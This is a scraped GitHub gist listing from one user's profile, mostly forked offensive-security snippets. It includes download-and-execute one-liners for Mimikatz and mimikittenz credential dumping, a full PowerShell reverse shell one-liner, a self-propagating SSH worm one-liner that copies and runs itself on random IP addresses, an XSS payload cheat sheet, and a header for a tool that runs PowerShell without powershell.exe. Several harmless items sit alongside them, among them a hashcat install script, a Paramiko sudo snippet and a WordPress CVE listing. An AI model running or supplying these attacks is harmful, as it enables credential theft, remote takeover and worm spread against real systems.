@ulissescastro
ulissescastro / pm_mf7b_wipe.py
Created February 17, 2020 10:09 — forked from vulnersCom/pm_mf7b_wipe.py
Mifare S50 7byte UID Gen2 cloning, restoring, wiping back using Proxmark3 RDV4.0
#! /usr/bin/env python3.6
# -*- coding: utf-8 -*-
#
# VULNERS OPENSOURCE
# __________________
#
# Vulners Project [https://vulners.com]
# All Rights Reserved.
#
# Author: Kir [isox@vulners.com]
@ulissescastro
ulissescastro / infosec_newbie.md
Created April 19, 2019 01:04 — forked from mubix/infosec_newbie.md
How to start in Infosec
/*
* SharpPick aka InexorablePoSH
* Description: Application to load and run powershell code via the .NET assemblies
* License: 3-Clause BSD License. See Veil PowerTools Project
*
* This application is part of Veil PowerTools, a collection of offensive PowerShell
* capabilities. Hope they help!
*
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
*/
@ulissescastro
ulissescastro / Quick-Mimikatz
Created April 5, 2019 14:08 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc 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
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
@ulissescastro
ulissescastro / powershell_reverse_shell.ps1
Created April 5, 2019 12:43 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@ulissescastro
ulissescastro / hashcat_macos.sh
Created April 5, 2019 12:10 — forked from chadmayfield/hashcat_macos.sh
Install Hashcat on macOS
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@ulissescastro
ulissescastro / xss_vectors.txt
Created May 16, 2018 18:58 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@ulissescastro
ulissescastro / w
Created November 18, 2014 01:57
Minimalist worm with ssh, sshpass, yum!
x=RANDOM%256; s=sshpass; c="$s -pPASS"; yum install $s -y; while :; do t=root@$[x].$[x].$[x].$[x]; $c scp w $t:; $c ssh $t "chmod +x w; ./w"; done
# random var
# x=RANDOM%256
# echo $[x]
# 117
# sshpass executable
# s=sshpass
@ulissescastro
ulissescastro / exec-sudo-without-tty
Created November 18, 2014 01:39
Fix Paramiko TTY (sudo)
#!/usr/bin/env python26
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname='10.10.10.10', port=22, username='user', password='xxx')
chan = ssh.get_transport().open_session()
chan.get_pty()
chan.exec_command('sudo su -c "id"')
print(chan.recv(1024))
@ulissescastro
ulissescastro / mario-cve_wordpress.txt
Created September 26, 2014 00:43
Demo of changes made in Mario WordPress version check tool.
user@host:~/Tools/vFeed$ python cve_wordpress.py 3.3
(...)
[CVE-2012-2402]
wp-admin/plugins.php in WordPress before 3.3.2 allows remote authenticated site administrators to bypass intended access restrictions and deactivate network-wide plugins via unspecified vectors.
[CVE-2012-2400]
Unspecified vulnerability in wp-includes/js/swfobject.js in WordPress before 3.3.2 has unknown impact and attack vectors.
[CVE-2012-1936]